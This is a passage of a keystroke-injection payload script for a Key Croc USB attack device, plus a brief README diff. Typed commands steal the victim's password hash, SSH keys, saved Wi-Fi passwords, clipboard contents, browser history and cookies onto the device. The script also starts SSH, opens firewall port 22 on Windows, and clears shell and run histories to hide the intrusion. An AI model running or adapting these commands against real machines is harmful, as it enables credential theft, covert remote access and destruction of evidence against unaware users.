QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
sleep 1 ;;
${TARGET_HOSTNAME})
#---> Start mate-terminal -->Parrot OS<--
Q ALT F2
sleep 1
Q STRING "mate-terminal"
Q ENTER ; sleep 1
#---> Check numlock state on or off
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
Q ENTER ; sleep 3
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 2
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER ; sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
Q STRING "PC_LOOT=/media/\$(whoami)/KeyCroc/loot/Croc_Pot"
Q ENTER ; sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | sudo tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "hostname -I | awk '{print \$1}' | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 5
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
QUACK STRING "sudo getent shadow \$(whoami) | tee \$MOUNT_LOOT/target_hash_passwd"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve contents of the clipboard
QUACK STRING "echo \"\$(xsel -b)\" >> \$MOUNT_POINT/Target_Clipboard.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve browser History & Cookies (chromium\fire-fox)
QUACK STRING "cp ~/.config/chromium/Default/History \$MOUNT_POINT/Browser history chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.config/chromium/Default/Cookies \$MOUNT_POINT/Browser cookies chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/formhistory \$MOUNT_POINT/Browser history fire-fox"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/cookies \$MOUNT_POINT/Browser cookies fire-fox"
QUACK ENTER ; QUACK DELAY 2000
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1 ;;
*)
#---> Start linux distributions terminal xterm
#---> Unsure of which linux distribution this will work on
Q ALT F2
sleep 1
Q STRING "xterm"
Q ENTER ; sleep 1
#---> Check numlock state on or off
Q STRING "if [ \$(xset -q | grep -Po '(?<=Num Lock:)\W*\K[^ ]*') == \"off\" ]; then echo -ne \"\n\nNUMLOCK STATE: OFF Payload may fail trun NUMLOCK ON\n\n\" ; else echo -ne \"\n\nNUMLOCK STATE: ON\n\n\"; fi" ; Q ENTER
Q ENTER ; sleep 3
#---> Create keycroc directory, Mount keycroc usb drive to target pc, Make KeyCroc folder executable
Q STRING "sudo mkdir /media/\$(whoami)/KeyCroc/ ; sudo mount /dev/sdd /media/\$(whoami)/KeyCroc/ ; sudo chmod 777 /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Entering Linux passwd
Q STRING "${PC_PW}"
Q ENTER ; sleep 1
#---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
Q ENTER ; sleep 1
#---> Retrieve target PC user name & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "whoami | sudo tee \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC IP address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "hostname -I | sudo tee -a \${PC_USER} && ip -4 -o addr show eth0 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && ip -4 -o addr show eth1 | awk '{print \$4}' | cut -d \"/\" -f 1 | sudo tee -a \${PC_USER} && sudo echo '' >> \${PC_USER}"
Q ENTER ; sleep 1
#---> Check with nmap SSH status of target pc
if [ "$(nmap `sed -n 2p /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt` -PN -p ssh | egrep -o 'open|closed|filtered')" = "closed" ]; then
Q STRING "sudo systemctl start ssh"
Q ENTER
else
Q STRING "SSH is running"
Q ENTER
fi
sleep 1
#---> Retrieve target PC SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve target PC MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
Q STRING "ip -o link | awk '\$2 != \"lo:\" {print \$2, \$(NF-2)}' | sudo tee -a \${PC_USER}"
Q ENTER ; sleep 1
#---> Retrieve Shark Jack IP if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "ping -c1 -w1 shark.lan | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 5
#---> Retrieve Shark Jack MAC address if connected to local network as target PC & save to tools/Croc_Pot/shark_ip.txt
Q STRING "arp shark.lan | awk '/'shark.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/shark_ip.txt"
Q ENTER ; sleep 2
#---> Retrieve packet squirrel MAC address if connected to local network as target PC & save to tools/Croc_Pot/squirrel_mac.txt
Q STRING "arp squirrel.lan | awk '/'squirrel.lan'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/squirrel_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle IP if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "ping -c1 -w1 turtle | grep PING | sed -e \"s/).*//\" | sed -e \"s/.*(//\" | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Lan turtle MAC address if connected to local network as target PC & save to tools/Croc_Pot/turtle_mac.txt
Q STRING "arp turtle | awk '/'turtle'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee -a /media/\$(whoami)/KeyCroc/tools/Croc_Pot/turtle_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve Bash Bunny MAC address if connected to local network as target PC ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
Q STRING "arp 172.16.64.1 | awk '/'172.16.64.1'/{print \$3}' | sed -e 's/HWaddress//g' | sudo tee /media/\$(whoami)/KeyCroc/tools/Croc_Pot/bunny_mac.txt"
Q ENTER ; sleep 2
#---> Retrieve target PC .ssh file save to /loot/Croc_Pot/SSH
Q STRING "sudo cp -fr ~/.ssh/. \${PC_LOOT}/SSH/"
Q ENTER ; sleep 2
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
Q STRING "sudo getent shadow \$(whoami) | sudo tee \${PC_LOOT}/target_hash_passwd"
Q ENTER ; sleep 2
#---> Unmount keycroc usb drive
Q STRING "sudo umount /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1
#---> Return back to ATTACKMODE HID mode
ATTACKMODE HID
#---> Remove keycroc directory off target pc
Q STRING "sudo rmdir /media/\$(whoami)/KeyCroc/"
Q ENTER ; sleep 1 ;;
esac
QUACK STRING "sudo umount /media/\$(whoami)/KeyCroc"
QUACK ENTER
;;
parrot)
#---> Start mate-terminal Parrot OS
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
#---> Create keycroc directory, Mount keycroc usb drive to target
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
QUACK ENTER ; QUACK DELAY 2000
#---> Entering Linux passwd
QUACK STRING "$TARGET_PW"
QUACK ENTER ; QUACK DELAY 2000
#---> Check numlock state on or off
QUACK STRING "cat /sys/class/leds/input*::numlock/brightness | uniq | sudo tee \$MOUNT_POINT/NumLock.txt"
QUACK ENTER ; QUACK DELAY 2000
if [ "$(sed -n 1p ${CROC_POT_DIR[0]}/NumLock.txt)" = 0 ]; then
QUACK NUMLOCK
sleep 2
fi
#---> Retrieve target user name & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "whoami | sudo tee \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target IP, MAC address & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "ip -o link show | awk '/wlan/{print \$2}' | cut -d':' -f1 | head -n1 | xargs -I{} sh -c 'ip addr show {} | awk \"/inet / {print \\\$2}\" | cut -d/ -f1; ip link show {} | awk \"/ether/ {print \\\$2}\"' | sudo tee -a \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target SSID/PASSWD & save to tools/Croc_Pot/Croc_OS_Target.txt
QUACK STRING "sudo grep -r '^psk=' /etc/NetworkManager/system-connections/ | sed -E -e 's/[/]//g' -e 's/etc//g' -e 's/NetworkManagersystem-connections//g' -e 's/.nmconnection:psk//g' | sudo tee -a \$MOUNT_POINT/tools/Croc_Pot/Croc_OS_Target.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Shark Jack IP, MAC address if connected to local network as target & save to tools/Croc_Pot/shark_ip.txt
QUACK STRING "ip neighbor | grep \$(nslookup shark.lan | awk '/^Address: / {print \$2}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/shark_ip.txt"
QUACK ENTER ; QUACK DELAY 5000
#---> Retrieve packet squirrel IP, MAC address if connected to local network as target & save to tools/Croc_Pot/squirrel_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup squirrel.lan | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/squirrel_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Lan turtle IP, MAC address if connected to local network as target & save to tools/Croc_Pot/turtle_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup turtle.lan | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/turtle_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve Bash Bunny MAC address if connected to local network as target ensure bunny is connected to network & save to tools/Croc_Pot/bunny_mac.txt
QUACK STRING "ip neighbor | grep \$(nslookup 172.16.64.1 | awk '/^Address: / {print \$2; exit}') | awk '{print \$1 \"\\n\" \$5}' | sudo tee \$MOUNT_POINT/tools/Croc_Pot/bunny_mac.txt"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target .ssh file save to /loot/Croc_Pot/SSH
QUACK STRING "sudo cp -fr ~/.ssh/. \$MOUNT_POINT/loot/Croc_Pot/SSH/"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve target file Structure
QUACK STRING "tree -f -a | sudo tee \$MOUNT_POINT/tools/Croc_Pot/Target_File_Structure.txt > /dev/null"
QUACK ENTER ; QUACK DELAY 3000
#---> Retrieve target hash passwd save to /loot/Croc_Pot/target_hash_passwd.txt
QUACK STRING "sudo getent shadow \$(whoami) | sudo tee \$MOUNT_POINT/loot/Croc_Pot/target_hash_passwd"
QUACK ENTER ; QUACK DELAY 2000
#---> Retrieve browser History & Cookies (chromium\fire-fox)
QUACK STRING "cp ~/.config/chromium/Default/History \$MOUNT_POINT/Browser history chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.config/chromium/Default/Cookies \$MOUNT_POINT/Browser cookies chromium"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/formhistory \$MOUNT_POINT/Browser history fire-fox"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "cp ~/.mozilla/firefox/*.default-release/cookies \$MOUNT_POINT/Browser cookies fire-fox"
QUACK ENTER ; QUACK DELAY 2000
#---> Unmount keycroc usb drive
QUACK STRING "sudo umount \$MOUNT_POINT"
QUACK ENTER
;;
esac
;;
esac
#---> Start SSH session with target PC
Q STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)"
Q ENTER ; sleep 2
#---> Return back to ATTACKMODE HID mode
QUACK DELAY 3000
ATTACKMODE HID
QUACK DELAY 3000
if [ "$TARGET_HOSTNAME" = raspberrypi ]; then
QUACK NUMLOCK
QUACK DELAY 2000
fi
#---> sed to remove powershell output unreadable character, "\r" endlines, replace "-" with ":"
if [ "$TARGET_OS" = "WINDOWS" ]; then
sed -i -e '1s/^[^[:print:]]*//' ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/target_email.txt
sed -i 's/\r//g' ${CROC_POT_DIR[0]}/Croc_OS_Target.txt ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt ${CROC_POT_DIR[0]}/NumLock.txt ${CROC_POT_DIR[0]}/target_email.txt
sed -i 's/-/:/g' ${CROC_POT_DIR[0]}/shark_ip.txt ${CROC_POT_DIR[0]}/squirrel_mac.txt ${CROC_POT_DIR[0]}/turtle_mac.txt ${CROC_POT_DIR[0]}/bunny_mac.txt
fi
#----> Check with nmap status of SSH on target
#----> Make sure that Windows Defender Firewall allows inbound connections to Windows through TCP port 22:
NMAP_SSH="$(nmap "$(sed -n 2p ${CROC_POT_DIR[0]}/Croc_OS_Target.txt)" -PN -p ssh | grep -E -o 'open|closed|filtered')"
if [ "$TARGET_OS" = "WINDOWS" ]; then
if [ "$NMAP_SSH" = "open" ]; then
QUACK STRING "Get-Service sshd"
QUACK ENTER ; QUACK DELAY 2000
elif [ "$NMAP_SSH" = "closed" ] || [ "$NMAP_SSH" = "filtered" ]; then
QUACK STRING "Set-Service -Name sshd -StartupType 'Automatic' ; Start-Service sshd"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "restart-service sshd"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
QUACK ENTER ; QUACK DELAY 6000
else
QUACK STRING "Get-Service sshd ; Get-NetFirewallRule -Name *OpenSSH-Server* | select Name, DisplayName, Description, Enabled"
QUACK ENTER ; QUACK DELAY 6000
fi
elif [ "$TARGET_OS" = "LINUX" ]; then
if [ "$NMAP_SSH" = "open" ]; then
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
elif [ "$NMAP_SSH" = "closed" ] || [ "$NMAP_SSH" = "filtered" ]; then
QUACK STRING "sudo systemctl start ssh"
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
else
QUACK STRING "sudo systemctl status sshd"
QUACK ENTER ; QUACK DELAY 3000 ; QUACK STRING "q"
QUACK STRING "sudo iptables -L"
QUACK ENTER ; QUACK DELAY 3000
fi
else
QUACK DELAY 1000
fi
QUACK ENTER
#---> Check target history and clear history
if [ "$TARGET_OS" = "WINDOWS" ]; then
QUACK STRING "Get-PnpDevice -Class \"Keyboard\" | Where-Object {\$_.Status -eq \"OK\" -and \$_.ClassGuid -eq \"{4d36e96b-e325-11ce-bfc1-08002be10318}\"} | Select-Object *"
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Get-Content \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER ; QUACK DELAY 2000
elif [ "$TARGET_OS" = "LINUX" ]; then
QUACK STRING "dmesg | grep \"usb.*RNDIS/Ethernet Gadget\|Keyboard\|usb-storage\""
QUACK ENTER ; QUACK DELAY 3000
QUACK STRING "history -n 500 ; history"
QUACK ENTER ; QUACK DELAY 2000
QUACK STRING "history -c ; rm ~/.bash_history"
QUACK ENTER ; QUACK DELAY 2000
fi
#---> Start SSH session with target
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER ; QUACK DELAY 2000
#---> Entering keycroc passwd
Q STRING "${CROC_PW}"
Q ENTER ; sleep 1
QUACK STRING "$CROC_PW"
QUACK ENTER ; QUACK DELAY 2000
#---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER
QUACK STRING "${CROC_POT_DIR[0]}.sh"
QUACK ENTER

2
payloads/library/general/Croc_Pot/README.md
View File

@@ -15,7 +15,7 @@
* **TESTED ON**
- Windows 10
- Raspberry pi 4
- Raspberry pi 5 bookworm
- linux parrot os
- Sorry no support for MAC OS